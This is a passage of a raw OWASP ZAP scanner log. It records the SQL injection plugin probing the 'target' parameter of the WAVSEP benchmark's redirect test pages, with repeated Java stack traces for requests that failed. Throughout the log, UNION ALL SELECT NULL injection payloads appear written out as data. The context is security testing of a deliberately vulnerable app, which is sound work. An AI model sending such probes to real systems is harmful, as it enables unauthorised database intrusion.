java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681798 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681798 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681799 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681800 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681801 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681801 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681803 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681803 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681804 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681805 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681813 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681819 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681819 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at 